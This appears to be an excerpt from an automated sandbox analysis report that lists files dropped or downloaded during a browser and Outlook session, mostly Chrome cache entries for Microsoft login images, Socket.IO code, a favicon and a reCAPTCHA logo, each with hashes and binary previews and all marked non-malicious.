                                                                                                              Preview:L..................F.@.. ...$+.,.....Gf..'..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 19:23:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2679
                                                                                                              Entropy (8bit):3.995982092684292
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8bdKTTq7WNHaidAKZdA1duTeehOuTbbiZUk5OjqehOuTbmy+yT+:8EXvTfTbxWOvTbmy7T
                                                                                                              MD5:B553E8637CDB57344DD3C50E6E2A034D
                                                                                                              SHA1:644C111721D5D2D3C67508FE0E959EFE9C193C0C
                                                                                                              SHA-256:68F27A537317047EE377E562F1B7CE187AE283E754DDAFCC995C463A35958ACA
                                                                                                              SHA-512:3ABD05F93066B5565BC973C7B1CFE972DCD8042C4BC81950D0982D535AFFA7A75F187E4B7393527B2C50C5C637983066C2E3FCEC574827BD15922B0B097DF4BC
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......C..'..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:Microsoft Outlook email folder (>=2003)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):271360
                                                                                                              Entropy (8bit):1.557263016281541
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:1Qc/8+2nyyYqFMdI36GsimhBfcNFuCGbQwK8BUTIZ9:W+oBYeP3QfY09QFeNZ9
                                                                                                              MD5:9708260331B1A50FAAAB6DA5381895C7
                                                                                                              SHA1:BDDA3C49021BEA8F6175F27042B7C94F056B4E91
                                                                                                              SHA-256:4FC31A607A4E9CE5B27BD86A4D7A99A5B7D3DE9230B51AAA69882A205EA67AB9
                                                                                                              SHA-512:E8DBF2C487A8F1938F0E896D7DF5D567E26167A36C5927B3E83DE53F2592F87EF1BBB27FCECDC4666101BF3CD6FEB8EE699D5CC9F60DB41EA29B245CFB0CBAC6
                                                                                                              Malicious:false
                                                                                                              Preview:!BDNw...SM......\...7...................X................@...........@...@...................................@...........................................................................$.......D.......C.......................(..........................................................................................................................................................................................................................................................................................................P.vl..J.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):131072
                                                                                                              Entropy (8bit):1.1164268040358039
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:doFPXqHR+icmUiOrW6PIWXZG0yO4rqW4dl7uKuNG1Ra:WGR+wiKBfau4
                                                                                                              MD5:00176810FF7595DFEC3C09F16EC86BBD
                                                                                                              SHA1:A398BC9ED07E3C28F008162429D64272A6F77E0A
                                                                                                              SHA-256:A2881C0A4EA9949421FDC10B911505C722D497BC396B6DEFEC9A4704362CE09E
                                                                                                              SHA-512:B4604F96432FA67111874CA1831F6DB5812DBC8EE6DF0E19534F9EE0B99E07E38AFE742077584F846F0B81DFE74957D4914B9AFB9140D0C1A5F84AE5E93A64C7
                                                                                                              Malicious:false
                                                                                                              Preview:5^.t0...I................'....................#.p........>..............x........r..........P...|........j.......................@..........0............r...............................................v......~...P............M.......................V......8.......<.......@a..........."..@...............>....#..D...................0$..H........g...........$..\.......@............'..`........|...........(..d........H..........0)..l...............n...p*..l...............n...p*..h........H...........)..H........g...........$..................................@..0...J................'....................#.!.......................q.......................&"......n........ ......o..............................................O............................................../...............................................................................................................................................................................................................................

                                                                                                              Chrome Cache Entry: 70

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2407
                                                                                                              Entropy (8bit):7.900400471609788
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                                                              Malicious:false
                                                                                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

                                                                                                              Chrome Cache Entry: 71

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                                                              Category:dropped
                                                                                                              Size (bytes):276
                                                                                                              Entropy (8bit):7.316609873335077
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                                                              MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                                                              SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                                                              SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                                                              SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                                                              Malicious:false
                                                                                                              Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

                                                                                                              Chrome Cache Entry: 72

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1435
                                                                                                              Entropy (8bit):7.8613342322590265
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                              Malicious:false
                                                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                                                                              Chrome Cache Entry: 73

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:ASCII text, with very long lines (49854)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):49993
                                                                                                              Entropy (8bit):5.216475744251136
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                                                              MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                                                              SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                                                              SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                                                              SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                                                              Malicious:false
                                                                                                              Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th

                                                                                                              Chrome Cache Entry: 74

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                                                              Category:dropped
                                                                                                              Size (bytes):199
                                                                                                              Entropy (8bit):6.766983163126765
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                                                              MD5:21B761F2B1FD37F587D7222023B09276
                                                                                                              SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                                                              SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                                                              SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                                                              Malicious:false
                                                                                                              Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

                                                                                                              Chrome Cache Entry: 75

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):673
                                                                                                              Entropy (8bit):7.6596900876595075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                              Malicious:false
                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                                                                                              Chrome Cache Entry: 76

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):1150
                                                                                                              Entropy (8bit):1.1540235446668508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:hlQeaqem0F2LkaqUEp/lMyM1kAWpj6Uq82l/n5555nD5555n:hl/aj2oaqpD7Mq2lB555nD5555n
                                                                                                              MD5:FEFF65CBCD278628D804C393CFEDB1A3
                                                                                                              SHA1:18FD8CACE3E63094A516CA7D0AB3278821ED5E31
                                                                                                              SHA-256:626F2477385BF5AB66834A4296F32FFFFFA831814B7E2B8F9E79CC2FD959958D
                                                                                                              SHA-512:3777C3EE89734B081B6584B8D4A385BDA129EBD5CB8BF77301C13E4BA86AF1CCF6FF555662FC8FDC33B68B8FAB17673621AA23F0F558A8686761C80BF4470A40
                                                                                                              Malicious:false
                                                                                                              URL:https://marty-n.com/favicon.ico
                                                                                                              Preview:............ .h.......(....... ..... ..................................................................................................................................................................................................................................................................................................................................................................................................i.......................i.m.i...i...i..i.T.i...i.......i...i.......O.c.....................i..i.9.i...i..Z5...i...i...i...i...i.Z.....O.......................i...i..i...i.......i...i...i...i..-................................i...i...i..i.......i...i...i.1.i..-....................................\.Y..................................................................................................................................................................................................................................................................................

                                                                                                              Chrome Cache Entry: 77

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):199
                                                                                                              Entropy (8bit):6.766983163126765
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                                                              MD5:21B761F2B1FD37F587D7222023B09276
                                                                                                              SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                                                              SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                                                              SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                                                              Malicious:false
                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                                                                              Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

                                                                                                              Chrome Cache Entry: 78

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):52
                                                                                                              Entropy (8bit):4.190260390968384
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                                                                              MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                                                                              SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                                                                              SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                                                                              SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                                                                              Malicious:false
                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQl3Y8coYl2EyxIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                                                                              Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=

                                                                                                              Chrome Cache Entry: 79

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):1435
                                                                                                              Entropy (8bit):7.8613342322590265
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                              Malicious:false
                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                                                                              Chrome Cache Entry: 80

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1636
                                                                                                              Entropy (8bit):4.214613323368661
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                                                              MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                                                              SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                                                              SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                                                              SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                                                              Malicious:false
                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

                                                                                                              Chrome Cache Entry: 81

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1150
                                                                                                              Entropy (8bit):1.1540235446668508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:hlQeaqem0F2LkaqUEp/lMyM1kAWpj6Uq82l/n5555nD5555n:hl/aj2oaqpD7Mq2lB555nD5555n
                                                                                                              MD5:FEFF65CBCD278628D804C393CFEDB1A3
                                                                                                              SHA1:18FD8CACE3E63094A516CA7D0AB3278821ED5E31
                                                                                                              SHA-256:626F2477385BF5AB66834A4296F32FFFFFA831814B7E2B8F9E79CC2FD959958D
                                                                                                              SHA-512:3777C3EE89734B081B6584B8D4A385BDA129EBD5CB8BF77301C13E4BA86AF1CCF6FF555662FC8FDC33B68B8FAB17673621AA23F0F558A8686761C80BF4470A40
                                                                                                              Malicious:false
                                                                                                              Preview:............ .h.......(....... ..... ..................................................................................................................................................................................................................................................................................................................................................................................................i.......................i.m.i...i...i..i.T.i...i.......i...i.......O.c.....................i..i.9.i...i..Z5...i...i...i...i...i.Z.....O.......................i...i..i...i.......i...i...i...i..-................................i...i...i..i.......i...i...i.1.i..-....................................\.Y..................................................................................................................................................................................................................................................................................

                                                                                                              Chrome Cache Entry: 82

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):2228
                                                                                                              Entropy (8bit):7.82817506159911
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                              MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                              Malicious:false
                                                                                                              URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
